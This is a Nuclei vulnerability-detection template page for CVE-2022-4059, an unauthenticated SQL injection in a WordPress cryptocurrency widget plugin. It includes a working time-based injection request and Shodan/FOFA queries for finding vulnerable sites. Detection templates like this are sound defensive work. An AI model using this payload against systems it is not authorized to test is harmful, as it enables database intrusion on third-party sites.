Skip to content
Nuclei Templates

Cryptocurrency Widgets Pack < 2.0 - SQL Injection

ID: CVE-2022-4059

Severity: critical

Author: r3Y3r53

Tags: time-based-sqli,cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli,blocksera

Description

Section titled “Description”

The plugin does not sanitise and escape some parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

YAML Source

Section titled “YAML Source”
id: CVE-2022-4059


info:
  name: Cryptocurrency Widgets Pack < 2.0 - SQL Injection
  author: r3Y3r53
  severity: critical
  description: |
    The plugin does not sanitise and escape some parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
  remediation: Fixed in version 2.0
  reference:
    - https://wpscan.com/vulnerability/d94bb664-261a-4f3f-8cc3-a2db8230895d
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4059
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4059
    cwe-id: CWE-89
    epss-score: 0.02077
    epss-percentile: 0.89035
    cpe: cpe:2.3:a:blocksera:cryptocurrency_widgets_pack:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: blocksera
    product: cryptocurrency_widgets_pack
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/cryptocurrency-widgets-pack/
    fofa-query: body=/wp-content/plugins/cryptocurrency-widgets-pack/
    publicwww-query: /wp-content/plugins/cryptocurrency-widgets-pack/
  tags: time-based-sqli,cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli,blocksera


http:
  - raw:
      - |
        @timeout: 20s
        GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=7'
          - 'len(body_1) == 0'
          - 'status_code_1 == 302'
          - 'contains(body_2, "Cryptocurrency Widgets Pack")'
        condition: and
# digest: 4a0a00473045022100e17eade7125dd4414278f96591820db9fcbaa171dd1b21eeba6fafcd08d5692802207c1a4e0318c71cd4e0bacdea44fa841f14ff25803378d81aa7af33823b83188d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-4059.yaml"

View on Github